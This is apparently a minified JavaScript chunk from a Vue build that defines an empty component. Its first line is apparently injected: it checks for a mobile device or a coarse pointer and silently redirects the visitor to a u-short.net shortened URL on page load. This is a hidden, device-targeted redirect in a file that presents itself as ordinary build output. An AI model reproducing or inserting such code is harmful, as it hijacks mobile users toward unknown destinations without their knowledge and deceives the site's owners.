(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as n}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as t,i as o}from"./vendor-vue-ui.232c7c36.js";const r={};function c(e,s){return t(),o("div")}const i=n(r,[["render",c]]);export{i as C};
